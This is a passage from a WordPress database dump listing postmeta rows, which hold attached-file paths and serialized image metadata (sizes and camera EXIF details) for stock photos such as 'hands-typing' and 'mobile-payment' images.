eight\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"hands-typing-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"hands-typing-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"hands-typing-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1007,48,'_edit_last','1'),(1008,48,'_wp_page_template','default'),(1011,246,'fw_options','a:0:{}'),(1012,48,'_edit_lock','1506012437:1'),(1013,247,'_wp_attached_file','2017/09/hands-typing-2.jpg'),(1014,247,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:26:\"2017/09/hands-typing-2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"hands-typing-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"hands-typing-2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"hands-typing-2-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"hands-typing-2-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1015,248,'_wp_attached_file','2017/09/hands-typing-3.jpg'),(1016,248,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:26:\"2017/09/hands-typing-3.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"hands-typing-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"hands-typing-3-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"hands-typing-3-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"hands-typing-3-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1017,249,'_wp_attached_file','2017/09/hands-typing-4.jpg'),(1018,249,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:26:\"2017/09/hands-typing-4.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"hands-typing-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"hands-typing-4-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"hands-typing-4-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"hands-typing-4-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1025,251,'_wp_attached_file','2017/09/hands-typing-5.jpg'),(1026,251,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:26:\"2017/09/hands-typing-5.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"hands-typing-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"hands-typing-5-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"hands-typing-5-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"hands-typing-5-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1027,252,'_wp_attached_file','2017/09/hands-typing-6.jpg'),(1028,252,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:26:\"2017/09/hands-typing-6.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"hands-typing-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"hands-typing-6-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"hands-typing-6-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"hands-typing-6-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1029,253,'_wp_attached_file','2017/09/hands-typing-7.jpg'),(1030,253,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:26:\"2017/09/hands-typing-7.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"hands-typing-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"hands-typing-7-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"hands-typing-7-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"hands-typing-7-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1031,255,'_wp_attached_file','2017/09/mobile-payment.jpg'),(1032,255,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:26:\"2017/09/mobile-payment.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"mobile-payment-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"mobile-payment-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"mobile-payment-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"mobile-payment-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1035,256,'_wp_attached_file','2017/09/mobile-payment-2.jpg'),(1036,256,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:28:\"2017/09/mobile-payment-2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"mobile-payment-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"mobile-payment-2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"mobile-payment-2-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"mobile-payment-2-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1037,257,'_wp_attached_file','2017/09/mobile-payment-3.jpg'),(1038,257,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:28:\"2017/09/mobile-payment-3.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"mobile-payment-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"mobile-payment-3-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"mobile-payment-3-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"mobile-payment-3-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1039,258,'_wp_attached_file','2017/09/mobile-payment-4.jpg'),(1040,258,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:28:\"2017/09/mobile-payment-4.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"mobile-payment-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"mobile-payment-4-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"mobile-payment-4-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"mobile-payment-4-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1041,259,'_wp_attached_file','2017/09/IMG_0740.jpg'),(1042,259,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_0740.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0740-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0740-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0740-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0740-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378300283\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:17:\"0.011111111111111\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1043,260,'_wp_attached_file','2017/09/IMG_0749.jpg'),(1044,260,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_0749.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0749-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0749-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0749-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0749-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378300410\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:17:\"0.011111111111111\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1045,261,'_wp_attached_file','2017/09/IMG_0774.jpg'),(1046,261,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_0774.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0774-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0774-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0774-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0774-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378300766\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1047,262,'_wp_attached_file','2017/09/IMG_0891.jpg'),(1048,262,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_0891.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0891-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0891-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0891-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0891-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378302813\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"500\";s:13:\"shutter_speed\";s:18:\"0.0055555555555556\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1049,263,'_wp_attached_file','2017/09/IMG_0943.jpg'),(1050,263,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_0943.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0943-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0943-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0943-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0943-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378304886\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"38\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1053,265,'_wp_attached_file','2017/09/IMG_0944.jpg'),(1054,265,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_0944.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0944-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0944-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0944-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0944-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378304903\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"32\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1055,266,'_wp_attached_file','2017/09/IMG_0958.jpg'),(1056,266,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_0958.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0958-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0958-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0958-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0958-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378305126\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:17:\"0.011111111111111\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1057,267,'_wp_attached_file','2017/09/IMG_0959.jpg'),(1058,267,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_0959.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0959-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0959-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0959-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0959-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 